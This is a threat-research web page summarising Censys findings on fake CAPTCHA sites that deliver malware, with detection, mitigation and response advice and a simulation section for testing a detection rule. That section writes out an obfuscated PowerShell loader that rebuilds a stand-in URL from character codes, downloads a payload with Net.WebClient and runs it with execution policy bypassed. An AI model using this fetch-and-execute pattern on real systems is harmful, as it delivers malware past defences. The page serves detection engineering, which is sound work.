SOC Prime Bias: Medium

27 Jan 2026 17:11
newspaper icon Censys

Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report examines a large-scale “Fake Captcha” ecosystem that weaponizes trusted web verification interfaces to deliver malicious payloads. Visual similarity across lures is not a reliable attribution signal, because the same front-end pattern can sit on top of different execution chains—PowerShell, VBScript, MSI installers, and server-driven push-notification delivery. Using high-volume perceptual hashing of screenshots, the analysis maps how the ecosystem is organized and emphasizes the separation between the user interface and the underlying payload workflow. Defenders are advised to move past cosmetic indicators and prioritize detection of execution logic and infrastructure.

Investigation

Censys identified 9,494 Fake Captcha assets and used perceptual hashing to cluster them by visual similarity, finding a dominant Cloudflare-like cluster representing about 70% of observed sites. Deeper review uncovered 32 distinct payload variants spanning clipboard-driven scripts, MSI-based installers, and Matrix Push C2–style push delivery. Infrastructure analysis showed separate backend server pools supporting each technique, with cited examples including 95.164.53.115 and ghost.nestdns.com.

Mitigation

Detection should not depend only on visual lure characteristics or clipboard behavior. Instead, monitor for unusual browser notification permission prompts, PowerShell or VBScript download-and-execute patterns, MSI launches originating from verification-themed URLs, and network traffic associated with known Matrix Push C2 endpoints. Block or sandbox suspicious verification pages and train users to grant browser permissions only on trusted, expected sites.

Response

When a Fake Captcha page is encountered, alert on subsequent PowerShell, VBScript, or MSI execution as well as notification subscription events. Correlate endpoint activity with network indicators such as the referenced malicious IPs and domains. Isolate impacted systems, capture volatile memory, and perform forensic analysis of any retrieved payloads.

Attack Flow

We are still updating this part. Sign up to get notified

Notify Me

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker needs to fetch a malicious payload while hiding the download URL. They construct the URL at runtime using character codes, embed the string “enc” (often seen in Base64‑encoded payloads), and then employ Net.WebClient.DownloadFile to retrieve the script. This technique matches the rule’s focus on “obfuscation + Net.WebClient”. Steps:

    1. Generate the download URL via character reconstruction: 
      $url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1"
    2. Create a placeholder variable containing the string “enc” to satisfy the second detection term: 
      $encTag = "enc"
    3. Invoke the download: 
      $wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, "$env:TEMPpayload.ps1")
    4. Execute the downloaded payload (optional for the test): 
      powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"

    The presence of Net.WebClient.DownloadFile, the word enc, and the use of [char]::FromCharCode (via the shorthand [char]) ensures the rule fires.

  • Regression Test Script:

    # -------------------------------------------------
# Simulated PowerShell loader – matches Sigma rule
# -------------------------------------------------
# 1. Reconstruct download URL using character codes
$url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49)
# The above spells: https://malicious.com/payload.ps1

# 2. Insert the "enc" token to satisfy the detection rule
$encTag = "enc"

# 3. Perform the download
$wc = New-Object System.Net.WebClient
$destination = "$env:TEMPpayload.ps1"
$wc.DownloadFile($url, $destination)

# 4. (Optional) Execute the payload
# powershell -ExecutionPolicy Bypass -File $destination

  • Cleanup Commands:

    # Remove the downloaded payload
$payloadPath = "$env:TEMPpayload.ps1"
if (Test-Path $payloadPath) {
    Remove-Item -Force $payloadPath
}

# Remove the WebClient object (garbage collection handled automatically)
Write-Host "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free